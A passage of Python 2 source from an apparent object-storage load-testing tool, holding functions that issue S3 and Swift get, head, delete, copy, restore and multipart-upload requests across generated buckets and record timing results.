rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
def swiftget_object(process_id, user, conn, result_queue):
request_type = 'swiftGetObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['X-auth-token'] = user.sk
if CONFIG['Testcase'] in (202, 900) and CONFIG['Range']:
rest.headers['Range'] = 'bytes=%s' % random.choice(CONFIG['Range'].split(';')).strip()
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
# If the data directory holds records of uploaded object names and versions, read from that file.
obj_v_file = 'data/objv-%d.dat' % process_id
if os.path.exists(obj_v_file) and os.path.getsize(obj_v_file) > 0:
handle_from_obj_v(request_type, obj_v_file, rest, process_id, user, conn, result_queue)
return
# Otherwise download using the lexically generated object names.
if not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if CONFIG['Range']:
rest.headers['Range'] = 'bytes=%s' % random.choice(CONFIG['Range'].split(';')).strip()
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
def swifthead_object(process_id, user, conn, result_queue):
request_type = 'swiftHeadObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['X-auth-token'] = user.sk
# If OBJECTS was passed in, process OBJECTS directly.
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
elif not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def head_object(process_id, user, conn, result_queue):
request_type = 'HeadObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
# If OBJECTS was passed in, process OBJECTS directly.
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
elif not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def delete_object(process_id, user, conn, result_queue):
request_type = 'DeleteObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
# If OBJECTS was passed in, process OBJECTS directly.
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
# If the data directory holds records of uploaded object names and versions, read from that file.
obj_v_file = 'data/objv-%d.dat' % process_id
if os.path.exists(obj_v_file) and os.path.getsize(obj_v_file) > 0:
handle_from_obj_v(request_type, obj_v_file, rest, process_id, user, conn, result_queue)
return
elif not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
range_arr = range(0, CONFIG['BucketsPerUser'])
# Stagger each thread's starting bucket to avoid a single-bucket performance bottleneck.
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,
process_id % CONFIG[
'BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftdelete_object(process_id, user, conn, result_queue):
request_type = 'swiftDeleteObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['X-auth-token'] = user.sk
# If OBJECTS was passed in, process OBJECTS directly.
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
# If the data directory holds records of uploaded object names and versions, read from that file.
obj_v_file = 'data/objv-%d.dat' % process_id
if os.path.exists(obj_v_file) and os.path.getsize(obj_v_file) > 0:
handle_from_obj_v(request_type, obj_v_file, rest, process_id, user, conn, result_queue)
return
elif not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
range_arr = range(0, CONFIG['BucketsPerUser'])
# Stagger each thread's starting bucket to avoid a single-bucket performance bottleneck.
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,
process_id % CONFIG[
'BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
# rest.bucket = '%s.%d' % (CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def restore_object(process_id, user, conn, result_queue):
request_type = 'RestoreObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
# If OBJECTS was passed in, process OBJECTS directly.
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
# If the data directory holds records of uploaded object names and versions, read from that file.
obj_v_file = 'data/objv-%d.dat' % process_id
if os.path.exists(obj_v_file) and os.path.getsize(obj_v_file) > 0:
handle_from_obj_v(request_type, obj_v_file, rest, process_id, user, conn, result_queue)
return
elif not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
rest.queryArgs['restore'] = None
range_arr = range(0, CONFIG['BucketsPerUser'])
# Stagger each thread's starting bucket to avoid a single-bucket performance bottleneck.
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,
process_id % CONFIG[
'BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
rest.sendContent = '<RestoreRequest xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Days>%s</Days><GlacierJobParameters><Tier>%s</Tier></GlacierJobParameters></RestoreRequest>' % (
CONFIG['RestoreDays'], CONFIG['RestoreTier'])
logging.debug('send content [%s] ' % rest.sendContent)
rest.headers['Content-MD5'] = base64.b64encode(hashlib.md5(rest.sendContent).digest())
j += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def delete_multi_objects(process_id, user, conn, result_queue):
if not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
if CONFIG['ObjectsPerBucketPerThread'] <= 0:
logging.warn('ObjectsPerBucketPerThread <= 0, exit..')
return
request_type = 'DeleteMultiObjects'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['delete'] = None
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
delete_times_per_bucket = math.ceil(
CONFIG['ObjectsPerBucketPerThread'] * 1.0 / CONFIG['DeleteObjectsPerRequest'])
logging.debug('ObjectsPerBucketPerThread: %d, DeleteObjectsPerRequest: %d, delete_times_per_bucket:%d' % (
CONFIG['ObjectsPerBucketPerThread'], CONFIG['DeleteObjectsPerRequest'], delete_times_per_bucket))
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
rest.sendContent = '<Delete>'
k = 0
while k < CONFIG['DeleteObjectsPerRequest']:
if j >= CONFIG['ObjectsPerBucketPerThread']:
break
rest.sendContent += '<Object><Key>%s</Key></Object>' % CONFIG['ObjectNamePartten'].replace('processID', str( process_id)).replace(
'Index', str(j)).replace('ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
k += 1
rest.sendContent += '</Delete>'
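# Sketch of the assembled multi-delete body (keys are illustrative):
# <Delete><Object><Key>obj-0-0</Key></Object><Object><Key>obj-0-1</Key></Object></Delete>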
logging.debug('send content [%s] ' % rest.sendContent)
rest.headers['Content-MD5'] = base64.b64encode(hashlib.md5(rest.sendContent).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftupload_dynamic_big_object(process_id, user, conn, result_queue):
request_type = 'swiftUploadDynamicBigObject'
sendContent = ''
rest = s3PyCmd.S3RequestDescriptor(request_type, ak = user.ak, sk = user.sk, send_content = sendContent)
rest.headers['X-auth-token'] = user.sk
fixed_size = False
rest.headers['content-type'] = 'application/octet-stream'
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.prefixkey = CONFIG['ObjectNameFixed']
# If the CalHashMD5 switch is on, write a custom metadata entry at upload time to mark the object as one uploaded by this tool's put.
if CONFIG['CalHashMD5']:
rest.headers['x-amz-meta-md5written'] = 'yes'
# Stagger each thread's starting bucket to avoid a single-bucket performance bottleneck.
range_arr = range(0, CONFIG['BucketsPerUser'])
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,process_id % CONFIG['BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
if CONFIG['ObjectLexical']:
rest.prefixkey = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index', str(
j)).replace('ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
else:
rest.prefixkey = Util.random_string_create(random.randint(300, 1024))
j += 1
parts_for_dynamic_big = CONFIG['PartsForEachUploadID']
for k in range(1,parts_for_dynamic_big+1):
if not fixed_size:
# change size every request for the same obj.
rest.contentLength, fixed_size = Util.generate_a_size(CONFIG['PartSize'])
rest.key = '%s-%d'%(rest.prefixkey,k)
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
rest.key = rest.prefixkey
rest.headers['x-object-manifest'] = ('%s/%s'%(rest.bucket, rest.key))
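# For a swift dynamic large object the manifest is an empty object whose x-object-manifest header
# names the "<container>/<segment prefix>" to concatenate, e.g. "ak0.bucket.0/obj-0-0" (illustrative),
# which matches the "<prefix>-<k>" segments uploaded in the loop above.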
partContentLength = rest.contentLength
rest.contentLength=0
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
rest.headers.pop('x-object-manifest')
rest.contentLength = partContentLength
def swiftdelete_dynamic_big_object(process_id, user, conn, result_queue):
request_type = 'swiftDeleteDynamicBigObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak = user.ak, sk = user.sk)
rest.headers['X-auth-token'] = user.sk
fixed_size = False
rest.headers['content-type'] = 'application/octet-stream'
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.prefixkey = CONFIG['ObjectNameFixed']
# If the CalHashMD5 switch is on, write a custom metadata entry at upload time to mark the object as one uploaded by this tool's put.
if CONFIG['CalHashMD5']:
rest.headers['x-amz-meta-md5written'] = 'yes'
# Stagger each thread's starting bucket to avoid a single-bucket performance bottleneck.
range_arr = range(0, CONFIG['BucketsPerUser'])
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,process_id % CONFIG['BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
if CONFIG['ObjectLexical']:
rest.prefixkey = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index', str(
j)).replace('ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
else:
rest.prefixkey = Util.random_string_create(random.randint(300, 1024))
j += 1
parts_for_dynamic_big = CONFIG['PartsForEachUploadID']
for k in range(1,parts_for_dynamic_big+1):
rest.key = '%s-%d'%(rest.prefixkey,k)
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
rest.key = rest.prefixkey
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
def copy_object(process_id, user, conn, result_queue):
if not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
request_type = 'CopyObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.headers['x-amz-acl'] = 'public-read-write'
rest.headers['x-amz-metadata-directive'] = 'COPY'
if CONFIG['copySrcObjFixed']:
rest.headers['x-amz-copy-source'] = '/' + CONFIG['copySrcObjFixed']
if CONFIG['copyDstObjFiexed']:
rest.bucket = CONFIG['copyDstObjFiexed'].split('/')[0]
rest.key = CONFIG['copyDstObjFiexed'].split('/')[1]
elif CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
if CONFIG['copySrcSrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-copy-source-server-side-encryption-customer-algorithm'] = 'AES256'
if CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG['SrvSideEncryptAlgorithm'].lower() == 'aws:kms':
rest.headers['x-amz-server-side-encryption'] = 'aws:kms'
if CONFIG['SrvSideEncryptAWSKMSKeyId']:
rest.headers['x-amz-server-side-encryption-aws-kms-key-id'] = CONFIG['SrvSideEncryptAWSKMSKeyId']
if CONFIG['SrvSideEncryptContext']:
rest.headers['x-amz-server-side-encryption-context'] = CONFIG['SrvSideEncryptContext']
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG['SrvSideEncryptAlgorithm'].lower() == 'aes256':
rest.headers['x-amz-server-side-encryption'] = 'AES256'
i = 0
while i < CONFIG['BucketsPerUser']:
# If neither a fixed destination object nor a fixed bucket is configured, use the source object's bucket as the destination.
if not CONFIG['copyDstObjFiexed'] and not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['copyDstObjFiexed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'] + '.copy')
if not CONFIG['copySrcObjFixed']:
rest.headers['x-amz-copy-source'] = '/%s/%s' % (
rest.bucket, CONFIG['ObjectNamePartten'].replace('processID', str(
process_id)).replace('Index', str(j)).replace('ObjectNamePrefix', CONFIG['ObjectNamePrefix']))
j += 1
if CONFIG['copySrcSrvSideEncryptType'].lower() == 'sse-c':
src_en_key = rest.headers['x-amz-copy-source'].split('/')[2][-32:].zfill(32)
rest.headers['x-amz-copy-source-server-side-encryption-customer-key'] = base64.b64encode(src_en_key)
rest.headers['x-amz-copy-source-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(src_en_key).digest())
logging.debug('src encrpt key: %s, src encrypt key md5: %s' % (
src_en_key, rest.headers['x-amz-copy-source-server-side-encryption-customer-key-MD5']))
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
# A 200 OK response does not by itself mean the copy succeeded. If 200 is returned but no ETag was obtained, change the status to a 500 error.
if resp.status.startswith('200 ') and not resp.return_data:
logging.info('response 200 OK without ETag, set status code 500 InternalError')
resp.status = '500 InternalError'
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes,
'copySrc:' + rest.headers['x-amz-copy-source'], resp.request_id, resp.status))
def init_multi_upload(process_id, user, conn, result_queue):
if not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
if CONFIG['ObjectsPerBucketPerThread'] <= 0 or CONFIG['BucketsPerUser'] <= 0:
logging.warn('ObjectsPerBucketPerThread or BucketsPerUser <= 0, exit..')
return
request_type = 'InitMultiUpload'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['uploads'] = None
if CONFIG['PutWithACL']:
rest.headers['x-amz-acl'] = CONFIG['PutWithACL']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG['SrvSideEncryptAlgorithm'].lower() == 'aws:kms':
rest.headers['x-amz-server-side-encryption'] = 'aws:kms'
if CONFIG['SrvSideEncryptAWSKMSKeyId']:
rest.headers['x-amz-server-side-encryption-aws-kms-key-id'] = CONFIG['SrvSideEncryptAWSKMSKeyId']
if CONFIG['SrvSideEncryptContext']:
rest.headers['x-amz-server-side-encryption-context'] = CONFIG['SrvSideEncryptContext']
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG['SrvSideEncryptAlgorithm'].lower() == 'aes256':
rest.headers['x-amz-server-side-encryption'] = 'AES256'
upload_ids = ''
i = 0
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
# If the request succeeded, record return_data (the UploadId) for writing to a local file.
if resp.status.startswith('200 '):
logging.debug('rest.key:%s, rest.returndata:%s' % (rest.key, resp.return_data))
upload_ids += '%s\t%s\t%s\t%s\n' % (user.username, rest.bucket, rest.key, resp.return_data)
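# Illustrative record buffered above (tab-separated, the UploadId value is made up):
# "usr0\tak0.bucket.0\tobj-0-0\t000001648C842F7B\n"; upload_part() reloads these lines later.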
if upload_ids == '':
return None
# Before returning, write the collected upload IDs to a local file.
uploadid_writer = None
uploadid_file = 'data/upload_id-%d.dat' % process_id
try:
uploadid_writer = open(uploadid_file, 'w')
uploadid_writer.write(upload_ids)
except Exception, data:
logging.error('process [%d] write upload_ids error %s' % (process_id, data))
finally:
if uploadid_writer:
try:
uploadid_writer.close()
except IOError:
pass
def upload_part(process_id, user, conn, result_queue):
# Load the upload_ids this process must handle from local files. To support several threads uploading
# parts of the same upload_id, upload_ids initialized by other processes of the same user are loaded too.
# E.g. with 5 users and 2 threads per user, each upload_id can be fed by at most 2 part-upload threads:
# upload_id-0(usr0,p0) upload_id-1(usr0,p1) upload_id-2(usr1,p2) upload_id-3(usr1,p3) upload_id-4(usr2,p4)
# upload_id-5(usr2,p5) upload_id-6(usr3,p6) upload_id-7(usr3,p7) upload_id-8(usr4,p8) upload_id-9(usr4,p9)
# p0 and p1 load usr0,p0 and usr0,p1 in order.
upload_ids = []
if not CONFIG['ConcurrentUpParts']:
id_files = [process_id]
else:
id_files = range(process_id / CONFIG['ThreadsPerUser'] * CONFIG['ThreadsPerUser'],
(process_id / CONFIG['ThreadsPerUser'] + 1) * CONFIG['ThreadsPerUser'])
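# Worked example (assumed values): with ThreadsPerUser=2 and ConcurrentUpParts on, process_id=3
# gives id_files = range(3/2*2, (3/2+1)*2) = [2, 3], so this thread also scans data/upload_id-2.dat
# for upload_ids initialized by the other thread of the same user.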
for i in id_files:
upload_id_file = 'data/upload_id-%d.dat' % i
try:
with open(upload_id_file, 'r') as fd:
for line in fd:
if line.strip() == '':
continue
# Skip upload_ids that were not initialized by this thread's user.
if not line.startswith(user.username + '\t'):
continue
if len(line.split('\t')) != 4:
logging.warn('upload_ids record error [%s]' % line)
continue
# Keep the process number i that originally created this upload_id.
upload_ids.append((str(i) + '.' + line.strip()).split('\t'))
fd.close()
logging.info('process %d load upload_ids file %s end' % (process_id, upload_id_file))
except Exception, data:
logging.error("load %s for process %d error, [%r], exit" % (upload_id_file, process_id, data))
continue
if not upload_ids:
logging.info("load no upload_id for process %d, from files upload_id-%r, exit" % (process_id, id_files))
return
else:
logging.info("total load %d upload_ids" % len(upload_ids))
fixed_size = False
request_type = 'UploadPart'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.headers['content-type'] = 'application/octet-stream'
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
for upload_id in upload_ids:
rest.bucket = upload_id[1]
rest.key = upload_id[2]
rest.queryArgs['uploadId'] = upload_id[3]
# partsRecord += '%d.%s\t%s\t%s\t%s\t' % (tup[0],user.username,tup[1],tup[2],tup[3])
parts_record = ''
# When concurrent part upload is enabled, this thread handles only a subset of the parts.
if not CONFIG['ConcurrentUpParts']:
part_ids = range(1, CONFIG['PartsForEachUploadID'] + 1)
else:
part_ids = range(process_id % CONFIG['ThreadsPerUser'] + 1, CONFIG['PartsForEachUploadID'] + 1,
CONFIG['ThreadsPerUser'])
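# Worked example (assumed values): with ThreadsPerUser=2, PartsForEachUploadID=6 and
# ConcurrentUpParts on, process_id=3 handles part_ids = range(3%2+1, 7, 2) = [2, 4, 6]
# while its peer thread (process_id=2) handles [1, 3, 5].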
logging.debug('process %d handle parts: %r' % (process_id, part_ids))
if not part_ids:
logging.info(
'process %d has no parts to do for upload_id %s, break' % (process_id, rest.queryArgs['uploadId']))
continue
for i in part_ids:
rest.queryArgs['partNumber'] = str(i)
if not fixed_size:
rest.contentLength, fixed_size = Util.generate_a_size(CONFIG['PartSize'])
